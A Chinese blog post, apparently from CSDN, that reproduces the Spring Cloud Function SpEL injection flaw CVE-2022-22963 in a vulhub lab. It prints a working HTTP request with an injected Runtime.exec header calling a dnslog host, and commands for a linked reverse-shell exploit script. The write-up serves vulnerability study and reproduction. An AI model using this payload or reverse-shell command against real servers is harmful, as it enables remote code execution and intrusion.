CVE-2022-22963漏洞复现

最新推荐文章于 2023-08-15 15:27:53 发布
最新推荐文章于 2023-08-15 15:27:53 发布
阅读量262 收藏
点赞数
文章标签: 安全 笔记 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59405467/article/details/132210818
版权

目录

漏洞原理

影响版本

漏洞复现

进入

拉取环境

POC

完成

或者使用工具

漏洞检测

反弹Shell

完成

漏洞原理

Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中,RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参 数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

漏洞复现

进入

cd vulhub-master/spring/CVE-2022-22963

拉取环境

docker-compose up -d

POC

发送如下数据包, spring.cloud.function.routing - expression 头中包含的 SpEL 表达式将会被执
行: 
POST /functionRouter HTTP/1.1
Host: xxxx:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression:
T(java.lang.Runtime).getRuntime().exec("ping 8qhvks.dnslog.cn")
Content-Type: text/plain
Content-Length: 4
test

网页 有ip 说明存在漏洞

完成

或者使用工具

反弹 Shell 脚本: https://github.com/sv3nbeast/Spring-cloud-function-SpEL-RCE-1

漏洞检测 

python3 Spel_RCE_POC.py url.txt

反弹Shell

python3 Spel_RCE_Bash_EXP.py http://xxxx:8080 xxxx:4444

 

完成

Tender…
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 2924
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
oiadkt的博客
04-21 455
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 2370
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现
Pluto.的博客
11-21 829
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
漏洞复现】Spring Cloud Function SPEL表达式注入漏洞cve-2022-22963
Hi~ 土拨鼠
04-01 1456
文章目录1、复现环境2、构造POC3、在vps上开启监听4、执行POC,成功反弹shell 1、复现环境 本文是在vulfocus在线环境进行的复现:http://vulfocus.io/ 2、构造POC 由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析 由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理 spring.cloud.function.routing-ex
Spring Clound Function Spel表达式注入漏洞CVE-2022-22963复现及排查
dayouzi的博客
08-15 135
Spring框架为现代基于java的企业应用程序(在任何类型的部署平台上)提供了一个全面的编程和配置模型。Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理,造成Spel表达式注入,攻击者可通过该漏洞执行任意代码。
CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现
afei001
03-31 4140
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5113
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
spring系列所有漏洞vulhub复现CVE-2022-22978、CVE-2022-22963CVE-2022-22965、CVE-2018-1273
qq_47289634的博客
07-07 911
注意,你需要在利用完成后将class.module.classLoader.resources.context.parent.pipeline.first.pattern清空,否则每次请求都会写入新的恶意代码在JSP Webshell中,导致这个文件变得很大。vulhub服务启动后,环境启动后,访问http://your-ip:8080/users,将可以看到一个用户注册页面。总体来说,这个漏洞的利用方法会修改目标服务器配置,导致目标需要重启服务器才能恢复,实际测试中需要格外注意。vulhub启动后执行。
CVE-2022-22963:Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 826
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
春秋云境:CVE-2022-22963
一只爱吃橙子的羊
01-20 762
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 630
[春秋云镜]CVE-2022-22963复现
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2070
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
CVE-2022-24663复现
giaogiaogioao的博客
11-23 504
CVE-2022-24663
cve-2022-41741漏洞复现
最新发布
08-24
根据引用的信息,CVE-2022-41741漏洞是在ngx_http_mp4_module中存在的一个内存损坏和内存泄漏的问题。该漏洞已经在nginx-1.23.2主线版中得到修复。因此,要复现CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可复现漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新至最新版本的NGINX,并避免使用已知存在漏洞的旧版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [立即升级 NGINX 以应对漏洞风险](https://blog.csdn.net/m0_58461993/article/details/127432416)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [远程执行代码漏洞(CVE-2018-0886)漏洞修复](https://download.csdn.net/download/liuxs1230/88237267)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tender…

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值